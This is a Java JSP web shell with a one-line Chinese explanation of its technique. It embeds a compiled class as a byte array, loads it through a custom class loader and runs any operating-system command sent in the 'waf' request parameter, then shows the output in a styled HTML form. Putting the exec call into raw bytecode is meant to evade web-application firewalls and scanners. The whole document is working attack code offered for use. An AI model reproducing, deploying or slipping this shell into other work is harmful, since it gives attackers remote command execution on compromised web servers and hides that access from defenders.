原理:先把命令执行类编码,然后使用自定义类加载器加载命令执行的类,进而调用方法
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.lang.reflect.InvocationTargetException" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<%!
private static String testClassName = "NeverGiveUp";
private static byte[] testClassByte = new byte[]{-54,-2,-70,-66,0,0,0,52,0,68,10,0,18,0,34,7,0,35,10,0,2,0,34,10,0,36,0,37,10,0,36,0,38,7,0,39,7,0,40,10,0,41,0,42,8,0,43,10,0,7,0,44,10,0,6,0,45,10,0,6,0,46,10,0,2,0,47,10,0,2,0,48,7,0,49,8,0,50,7,0,51,7,0,52,1,0,6,60,105,110,105,116,62,1,0,3,40,41,86,1,0,4,67,111,100,101,1,0,15,76,105,110,101,78,117,109,98,101,114,84,97,98,108,101,1,0,11,83,104,111,119,82,117,110,116,105,109,101,1,0,45,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,105,108,100,101,114,59,1,0,13,83,116,97,99,107,77,97,112,84,97,98,108,101,7,0,53,7,0,35,7,0,54,7,0,55,7,0,39,7,0,49,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,16,78,101,118,101,114,71,105,118,101,85,112,46,106,97,118,97,12,0,19,0,20,1,0,23,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,105,108,100,101,114,7,0,54,12,0,56,0,57,12,0,58,0,59,1,0,22,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,1,0,25,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,82,101,97,100,101,114,7,0,55,12,0,60,0,61,1,0,3,71,66,75,12,0,19,0,62,12,0,19,0,63,12,0,64,0,65,12,0,66,0,24,12,0,66,0,67,1,0,19,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,1,0,44,69,120,101,99,32,99,111,109,109,97,110,100,32,101,114,114,111,114,33,32,66,121,32,84,48,48,108,115,45,49,50,50,57,54,45,120,105,109,99,120,48,49,48,49,1,0,11,78,101,118,101,114,71,105,118,101,85,112,1,0,16,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,1,0,16,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,1,0,17,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,1,0,17,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,1,0,10,103,101,116,82,117,110,116,105,109,101,1,0,21,40,41,76,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,59,1,0,4,101,120,101,99,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,1,0,14,103,101,116,73,110,112,117,116,83,116,114,101,97,109,1,0,23,40,41,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,1,0,42,40,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,1,0,19,40,76,106,97,118,97,47,105,111,47,82,101,97,100,101,114,59,41,86,1,0,8,114,101,97,100,76,105,110,101,1,0,20,40,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,6,97,112,112,101,110,100,1,0,28,40,67,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,105,108,100,101,114,59,0,33,0,17,0,18,0,0,0,0,0,2,0,1,0,19,0,20,0,1,0,21,0,0,0,29,0,1,0,1,0,0,0,5,42,-73,0,1,-79,0,0,0,1,0,22,0,0,0,6,0,1,0,0,0,4,0,9,0,23,0,24,0,1,0,21,0,0,0,-48,0,6,0,6,0,0,0,85,-69,0,2,89,-73,0,3,76,42,-58,0,74,-72,0,4,77,44,42,-74,0,5,78,-69,0,6,89,-69,0,7,89,45,-74,0,8,18,9,-73,0,10,-73,0,11,58,4,1,58,5,25,4,-74,0,12,89,58,5,-58,0,18,43,25,5,-74,0,13,16,10,-74,0,14,87,-89,-1,-23,43,-80,77,43,18,16,-74,0,13,-80,1,-80,0,1,0,12,0,74,0,75,0,15,0,2,0,22,0,0,0,46,0,11,0,0,0,6,0,8,0,7,0,12,0,9,0,16,0,10,0,22,0,11,0,44,0,12,0,47,0,13,0,73,0,14,0,75,0,15,0,76,0,16,0,83,0,19,0,25,0,0,0,45,0,4,-1,0,47,0,6,7,0,26,7,0,27,7,0,28,7,0,29,7,0,30,7,0,26,0,0,25,-1,0,1,0,2,7,0,26,7,0,27,0,1,7,0,31,7,0,1,0,32,0,0,0,2,0,33};
public static class MeClassLoder extends ClassLoader {
@Override
protected Class<?> findClass(String name) throws ClassNotFoundException {
if(name.equals(testClassName)){
return defineClass(testClassName,testClassByte,0,testClassByte.length);
}
return super.findClass(name);
}
public static StringBuilder Go(String waf) throws ClassNotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException, InvocationTargetException {
if(waf!=null){
MeClassLoder loder = new MeClassLoder();
Class<?> testclass = loder.loadClass(testClassName);
Object testInstance =testclass.newInstance();
Method method = testInstance.getClass().getMethod("ShowRuntime",String.class);
return (StringBuilder)method.invoke(testInstance,waf);
}
return null;
}
}
%>
<%String waf = request.getParameter("waf");
StringBuilder result = new StringBuilder();
MeClassLoder test = new MeClassLoder();%>
<html><head><title>Custom class loader shell</title><style type="text/css"> body.c10 {padding:0; margin: 0; height: 100%; background-color: #000;} div.c9 {background-color: #000; margin: 20px auto 0; padding: 20px 0; position: relative; width: 100%} table.c8 {width: 100%; border-collapse: collapse; color: #36cc5e;} td.c7 {text-align: center; border: 1px solid #999999; padding: 10px;} input.c6 { padding: 0 6px; height: 30px; border: 1px solid #b7b7b7; border-radius: 3px; width: 270px; color: #fff; background-color: #36cc5e; border-color: #36cc5e;} tr.c5 {text-align: center;} td.c4 { border: 1px solid #999999; padding: 10px;} input.c3 { height: 30px; width: 260px; padding: 4px 11px; color: rgba(0,0,0,.65); font-size: 14px; line-height: 1.5715; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px;} td.c2 { text-align: center; border: 1px solid #999999; padding: 10px; position: relative;} h2.c1 {margin: 0; display: inline-block;}</style></head><body class="c10"><div class="c9"><form method="post" action="#"><table class="imagetable c8"><tr><td class="c2"><h2 class="c1">Custom class loader shell — By ximcx</h2></td></tr><tr class="c5"><td class="c4"><input name="waf" class="c3" type="text" value="<%=request.getParameter("waf") %>"></td></tr><tr><td class="c7"><input class="c6" type="submit" value="提交"></td></tr><tr><%if(waf!=null){result = test.Go(waf);out.print("<td style=\"border: 1px solid #999999; padding: 0 0 0 35%;\"><pre>"+result+"</pre></td>");} %></tr></table></form></div></body></html>